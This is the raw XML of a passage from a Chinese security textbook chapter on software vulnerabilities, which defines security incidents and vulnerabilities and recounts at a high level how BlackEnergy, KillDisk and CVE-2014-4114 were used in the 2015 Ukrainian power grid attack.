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6BB2C" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>第二章 软件脆弱性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F761CD" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="006E388D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞基础知识</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646FAEA4" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="000012A0" w:rsidRDefault="002C1A85" w:rsidP="006E388D">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 xml:space="preserve">.1.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>安全事件与软件漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8BBA1F" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>安全事件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A700A5C"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（网络）安全事件指的是在给定的时间段</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内，利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞或者其他攻击手段，在攻击对象中注入并触发恶意代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，产生拒绝服务、信息泄</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>露、信息窃取、目标控制等后果</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274A2FC2"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描述安全事件的要素主要包含攻击时间、攻击对象、攻击手段（恶意代码、软件漏洞）和攻击后果等。描述软件漏洞攻击能力的要素主要包含影响范围，如系统类型、版本；攻击能力，如信息泄露、拒绝服务、提权、远程代码执行；攻击方式，如本地或远程等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6416F220"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分析安全事件可从具体的安全事件出发，探究安全事件的要素，以及要素的关联，如乌克兰电网攻击安全事件；也可从具体的软件漏洞出发，探究软件漏洞的利用方式，以及漏洞的机理，如沙虫漏洞（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://www.freebuf.com/vuls/51735.html）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；还可从具体的恶意软件出发，探究恶意软件的攻击方式，以及攻击机理，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BlackEnergy、KillDisk等</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F53AEDB"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下面以乌克兰电网攻击事件为例，介绍安全事件背后关联及采用的相关技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286803B7"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2015年12月23日下午，乌克兰首都基辅部分地区和乌克兰西部</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>部分地区突发停电，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这次停电不是因为电力短缺，而是遭到了黑客攻击。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当天，黑客攻击了约</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>60座变电站。黑客首先操作恶意软件将电力公司的主控电脑与变电站断连，随后又在系统中植入病毒，让电脑全体瘫痪。与此同时，黑客还对电力公司的电话通讯进行了干扰，导致受到停电影响的居民无法和电力公司进行联系。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39635C7F"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安全公司</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ESET</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2016</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>年</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3日表示乌克兰电力部门感染的是恶意代</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>码“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BlackEnergy”(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>黑色能量</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BlackEnergy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>被当作</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后门使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，并释放</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>了KillDisk</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>破坏数据来延缓系统的恢复。同时在其他服务器还发现一</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个添加后门的SSH程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，攻击者可以根据内置密码随时连入受感染</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>主机。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E045E2"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黑客利用欺骗手段让电力公司员工下载了恶意软件“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BlackEnergy”。该恶意软件最早可追溯到2007年，由俄罗斯地下黑客组织开发并广泛使用，包括用来“刺探”全球各国的电力公司</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>014</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>年俄罗斯黑客团队“沙虫”（SandWorm）使用该软件攻击了欧美的SCADA工控系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE5CF76"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lastRenderedPageBreak/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BlackEnergy”</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>使用了Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>OLE远程代码执行漏洞CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-2014-4114</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，该漏洞几乎影响当时流行Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的所有版本，通过在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系列文档中嵌入恶意程序，通过邮件附件传播</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>目前已知的漏洞攻击载体是office2007系列组件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>黑客通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方式向电力系统员工发送含有恶意程序的Office文档，员工</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>含有</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恶意组件BlackEnergy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的文档，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>BlackEnergy侵入员工电力办公系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>继续下载恶意组件KillDisk</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>擦除电脑数据破坏HMI软件监视管理系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。攻击流程如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3454ABF9"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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B060DE7" wp14:editId="62503B3F">
            <wp:extent cx="5274310" cy="2571226"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="95" name="图片 95" descr="https://img2018.cnblogs.com/blog/1299746/201811/1299746-20181119154719956-324653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299746/201811/1299746-20181119154719956-32465396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71226"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F563B96" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:pStyle w:val="af4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 乌克兰电网攻击事件示意图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A38B1F3" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>软件漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0F838F"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漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(Vulnerability)，通常也称脆弱性，RFC2828</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将漏洞定义为“系统设计、实现或操作管理中存在的缺陷或弱点</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，能被利用而</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>违背系统的安全策略。攻击者利用漏洞可以获得计算机系统的额外权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A36B4FA"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描述安全漏洞的要素有</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>受影响的软件版本</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>POC‐验证漏洞存在的代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>漏洞触发的条件</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>攻击能力</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC9C538"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以</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE-2014</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
